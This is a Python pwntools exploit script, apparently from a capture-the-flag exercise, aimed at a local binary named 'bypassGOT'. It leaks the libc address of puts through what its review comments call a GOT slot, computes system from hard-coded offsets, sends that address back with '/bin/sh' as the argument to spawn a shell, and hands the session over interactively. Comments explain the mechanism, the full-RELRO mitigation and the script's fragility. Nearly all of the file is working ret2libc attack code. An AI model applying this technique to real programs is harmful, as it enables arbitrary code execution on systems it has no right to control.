#!/usr/bin/python

from pwn import *

def main() -> None:
    """Two-stage exploit driver for the local ``./bypassGOT`` binary.

    Stage 1 sends a padded command string followed by one 32-bit address and
    reads the bytes the target echoes back between parentheses; those bytes
    are unpacked as the address of ``puts`` in the target's libc.  Stage 2
    derives ``system`` from fixed libc offsets and sends that address back.

    The whole function is interactive I/O against the spawned process: the
    order of ``send``/``recvrepeat`` calls and the 0.2 s timeouts are part of
    the protocol with the target, so statements must not be reordered.

    Raises:
        Whatever ``process``/``send``/``u32`` raise on a failed spawn, a
        closed pipe, or a leak shorter than four bytes.
    """
    # Spawn the target from the current working directory (no sandboxing).
    p = process("./bypassGOT")

    # Address whose contents the first stage asks the target to print.
    # NOTE(review): 0x0804a018 sits in the classic 32-bit non-PIE data range
    # and the binary is named "bypassGOT", so this is presumably a GOT slot;
    # confirm against the binary. A GOT that stays writable after relocation
    # is what makes a leak-then-overwrite like this possible -- linking with
    # full RELRO (-Wl,-z,relro,-z,now) leaves it read-only after load.
    leak_address = 0x0804a018 
    command = "/bin/sh"
    # 24 bytes of command+NUL padding, then the 4-byte little-endian address.
    # NOTE(review): the 24-byte layout is dictated by the target's input
    # buffer and is not verified here; a different build needs a different
    # width.
    stage_1 = command.ljust(24, "\x00") + p32(leak_address)
    # Drain whatever the target prints on start-up before sending stage 1.
    p.recvrepeat(0.2)


    p.send(stage_1)


    # Collect the reply and keep only what lies between the first "(" and
    # the last ")".  If either marker is missing, find()/rfind() return -1
    # and the slice silently degrades (starts at 0 / drops the last byte).
    data = p.recvrepeat(0.2)
    leak = data[data.find("(")+1:data.rfind(")")]
    log.info("Got leaked data: %s" % leak)
    # Little-endian 32-bit unpack of the first four leaked bytes.  u32 expects
    # exactly four bytes, so a shorter leak raises here rather than later.
    puts_addr = u32(leak[:4])
    log.info("puts@libc:0x%x" % puts_addr)


    # Symbol offsets hard-coded for one specific libc build.  They are not
    # looked up from the leak, so against any other libc the computed
    # system address is simply wrong.
    puts_offset = 0x00067360 
    libc_base = puts_addr - puts_offset
    system_offset = 0x0003cd10
    system_addr = libc_base + system_offset
    log.info("system@libc: 0x%x" % system_addr)

    # Stage 2: the target is expected to read a 4-byte value and use it as
    # a return/call target; what it does with it is not visible from here.
    ret_address = system_addr 
    p.send(p32(ret_address))

    # Hand the pipes over to the user's terminal.
    p.interactive()

    # NOTE(review): str and bytes are mixed throughout ("..." + p32(...),
    # data.find("(") on recv output), which only works on Python 2 as the
    # shebang suggests; a Python 3 pwntools would need b"..." literals.

# Script entry point: only run the exploit driver when executed directly,
# not when imported.
if __name__ == "__main__":
    main()
